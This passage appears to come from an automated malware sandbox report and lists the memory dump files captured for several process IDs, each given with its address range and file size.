                            • memory/2896-66-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/2896-64-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/2896-417-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/2896-222-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/2896-414-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/2896-411-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/2896-71-0x0000000021500000-0x0000000021534000-memory.dmp

                              Filesize

                              208KB

                            • memory/2896-408-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/2896-405-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/2896-327-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/2896-399-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/2896-396-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/2896-393-0x0000000001000000-0x0000000002254000-memory.dmp

                              Filesize

                              18.3MB

                            • memory/2896-212-0x0000000022040000-0x0000000022059000-memory.dmp

                              Filesize

                              100KB

                            • memory/2896-211-0x0000000022040000-0x0000000022059000-memory.dmp

                              Filesize

                              100KB

                            • memory/4548-104-0x0000000000400000-0x0000000000478000-memory.dmp

                              Filesize

                              480KB

                            • memory/4548-110-0x0000000000400000-0x0000000000478000-memory.dmp

                              Filesize

                              480KB

                            • memory/4548-109-0x0000000000400000-0x0000000000478000-memory.dmp

                              Filesize

                              480KB

                            • memory/4548-107-0x0000000000400000-0x0000000000478000-memory.dmp

                              Filesize

                              480KB

                            • memory/4880-106-0x0000000000400000-0x0000000000462000-memory.dmp

                              Filesize

                              392KB

                            • memory/4880-112-0x0000000000400000-0x0000000000462000-memory.dmp

                              Filesize

                              392KB

                            • memory/4880-111-0x0000000000400000-0x0000000000462000-memory.dmp

                              Filesize

                              392KB

                            • memory/4928-45-0x00000000072D0000-0x0000000007366000-memory.dmp

                              Filesize

                              600KB

                            • memory/4928-25-0x0000000002750000-0x0000000002786000-memory.dmp

                              Filesize

                              216KB

                            • memory/4928-26-0x0000000005220000-0x0000000005848000-memory.dmp

                              Filesize

                              6.2MB

                            • memory/4928-27-0x00000000051A0000-0x00000000051C2000-memory.dmp

                              Filesize

                              136KB

                            • memory/4928-28-0x00000000058C0000-0x0000000005926000-memory.dmp

                              Filesize

                              408KB

                            • memory/4928-29-0x0000000005930000-0x0000000005996000-memory.dmp

                              Filesize

                              408KB

                            • memory/4928-39-0x0000000005A20000-0x0000000005D74000-memory.dmp

                              Filesize

                              3.3MB

                            • memory/4928-41-0x0000000006060000-0x000000000607E000-memory.dmp

                              Filesize

                              120KB

                            • memory/4928-42-0x00000000060B0000-0x00000000060FC000-memory.dmp

                              Filesize

                              304KB

                            • memory/4928-43-0x00000000078B0000-0x0000000007F2A000-memory.dmp

                              Filesize

                              6.5MB

                            • memory/4928-44-0x0000000006600000-0x000000000661A000-memory.dmp

                              Filesize

                              104KB

                            • memory/4928-46-0x0000000007270000-0x0000000007292000-memory.dmp

                              Filesize

                              136KB

                            • memory/4928-47-0x00000000084E0000-0x0000000008A84000-memory.dmp

                              Filesize

                              5.6MB

                            • memory/4928-49-0x0000000008A90000-0x000000000C117000-memory.dmp

                              Filesize

                              54.5MB